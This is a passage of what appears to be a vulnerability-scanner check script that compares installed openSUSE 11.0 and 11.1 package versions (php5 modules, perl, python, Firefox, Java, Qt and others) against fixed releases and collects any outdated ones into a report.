isrpmvuln(pkg:\"parted\", rpm:\"parted~1.8.8~91.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"parted-devel\", rpm:\"parted-devel~1.8.8~91.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.10.0~62.17.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl-base\", rpm:\"perl-base~5.10.0~62.17.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl-doc\", rpm:\"perl-doc~5.10.0~62.17.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl-satsolver\", rpm:\"perl-satsolver~0.13.2~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dbase\", rpm:\"php5-dbase~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-hash\", rpm:\"php5-hash~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ncurses\", rpm:\"php5-ncurses~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-readline\", rpm:\"php5-readline~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tidy\", rpm:\"php5-tidy~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"powerdevil\", rpm:\"powerdevil~1.4.1~4.5.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"powerdevil-lang\", rpm:\"powerdevil-lang~1.4.1~4.5.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ptools\", rpm:\"ptools~0.1~2.16.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.6.0~2.21.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-base\", rpm:\"python-base~2.6.0~2.22.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-curses\", rpm:\"python-curses~2.6.0~2.21.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-demo\", rpm:\"python-demo~2.6.0~2.21.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-devel\", rpm:\"python-devel~2.6.0~2.22.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-gdbm\", rpm:\"python-gdbm~2.6.0~2.21.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-idle\", rpm:\"python-idle~2.6.0~2.21.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-m2crypto\", rpm:\"python-m2crypto~0.17~2.1.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-satsolver\", rpm:\"python-satsolver~0.13.2~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-tk\", rpm:\"python-tk~2.6.0~2.21.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-xml\", rpm:\"python-xml~2.6.0~2.22.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-xpcom190\", rpm:\"python-xpcom190~1.9.0.6~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"qt4-x11-tools\", rpm:\"qt4-x11-tools~4.4.3~4.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ruby-satsolver\", rpm:\"ruby-satsolver~0.13.2~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"satsolver-tools\", rpm:\"satsolver-tools~0.13.2~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sblim-sfcb\", rpm:\"sblim-sfcb~1.3.2~9.12.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sysvinit\", rpm:\"sysvinit~2.86~186.15.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tiff\", rpm:\"tiff~3.8.2~133.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd\", rpm:\"ulogd~1.24~129.51.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-mysql\", rpm:\"ulogd-mysql~1.24~129.51.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-pcap\", rpm:\"ulogd-pcap~1.24~129.51.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-pgsql\", rpm:\"ulogd-pgsql~1.24~129.51.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-sqlite\", rpm:\"ulogd-sqlite~1.24~129.51.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wine\", rpm:\"wine~1.1.9~1.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wine-devel\", rpm:\"wine-devel~1.1.9~1.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2\", rpm:\"yast2~2.17.59~1.2.13\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-devel-doc\", rpm:\"yast2-devel-doc~2.17.59~1.2.13\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-pkg-bindings\", rpm:\"yast2-pkg-bindings~2.17.31~1.2.10\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"zypper\", rpm:\"zypper~1.0.5~2.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~3.0.6~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox-translations\", rpm:\"MozillaFirefox-translations~3.0.6~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audacity\", rpm:\"audacity~1.3.4~56.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.6~86.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.6~86.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.6~86.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.6~86.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.6~86.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dovecot\", rpm:\"dovecot~1.0.13~24.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dovecot-devel\", rpm:\"dovecot-devel~1.0.13~24.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-packagekit\", rpm:\"gnome-packagekit~0.2.1~15.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun\", rpm:\"java-1_6_0-sun~1.6.0.u12~1.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-alsa\", rpm:\"java-1_6_0-sun-alsa~1.6.0.u12~1.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-demo\", rpm:\"java-1_6_0-sun-demo~1.6.0.u12~1.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-devel\", rpm:\"java-1_6_0-sun-devel~1.6.0.u12~1.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-jdbc\", rpm:\"java-1_6_0-sun-jdbc~1.6.0.u12~1.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-plugin\", rpm:\"java-1_6_0-sun-plugin~1.6.0.u12~1.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-src\", rpm:\"java-1_6_0-sun-src~1.6.0.u12~1.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libQtWebKit-devel\", rpm:\"libQtWebKit-devel~4.4.0~12.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libQtWebKit4\", rpm:\"libQtWebKit4~4.4.0~12.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipulog\", rpm:\"libipulog~1.24~101.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4\", rpm:\"libqt4~4.4.0~12.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-devel\", rpm:\"libqt4-devel~4.4.0~12.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-devel-doc\", rpm:\"libqt4-devel-doc~4.4.0~12.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-qt3support\", rpm:\"libqt4-qt3support~4.4.0~12.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql\", rpm:\"libqt4-sql~4.4.0~12.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql-mysql\", rpm:\"libqt4-sql-mysql~4.4.0~5.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql-postgresql\", rpm:\"libqt4-sql-postgresql~4.4.0~5.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql-sqlite\", rpm:\"libqt4-sql-sqlite~4.4.0~12.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql-unixODBC\", rpm:\"libqt4-sql-unixODBC~4.4.0~5.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-x11\", rpm:\"libqt4-x11~4.4.0~12.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libsatsolver-devel\", rpm:\"libsatsolver-devel~0.9.6~0.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libsatsolver-perl\", rpm:\"libsatsolver-perl~0.9.6~0.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libsatsolver-ruby\", rpm:\"libsatsolver-ruby~0.9.6~0.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libtiff-devel\", rpm:\"libtiff-devel~3.8.2~108.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libtiff3\", rpm:\"libtiff3~3.8.2~108.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt\", rpm:\"libvirt~0.4.0~59.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-devel\", rpm:\"libvirt-devel~0.4.0~59.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-doc\", rpm:\"libvirt-doc~0.4.0~59.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-python\", rpm:\"libvirt-python~0.4.0~59.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.6.32~11.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.6.32~11.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-doc\", rpm:\"libxml2-doc~2.6.32~11.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libzypp\", rpm:\"libzypp~4.28.1~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libzypp-devel\", rpm:\"libzypp-devel~4.28.1~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.11.2~36.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190\", rpm:\"mozilla-xulrunner190~1.9.0.6~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-devel\", rpm:\"mozilla-xulrunner190-devel~1.9.0.6~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-gnomevfs\", rpm:\"mozilla-xulrunner190-gnomevfs~1.9.0.6~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-translations\", rpm:\"mozilla-xulrunner190-translations~1.9.0.6~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"netatalk\", rpm:\"netatalk~2.0.3~218.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"netatalk-devel\", rpm:\"netatalk-devel~2.0.3~218.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"novell-ipsec-tools\", rpm:\"novell-ipsec-tools~0.6.3~183.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"novell-ipsec-tools-devel\", rpm:\"novell-ipsec-tools-devel~0.6.3~183.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp\", rpm:\"openslp~1.2.0~143.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp-devel\", rpm:\"openslp-devel~1.2.0~143.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp-server\", rpm:\"openslp-server~1.2.0~143.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.10.0~37.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl-base\", rpm:\"perl-base~5.10.0~37.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl-doc\", rpm:\"perl-doc~5.10.0~37.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dbase\", rpm:\"php5-dbase~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-hash\", rpm:\"php5-hash~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.2.6~0.8\", 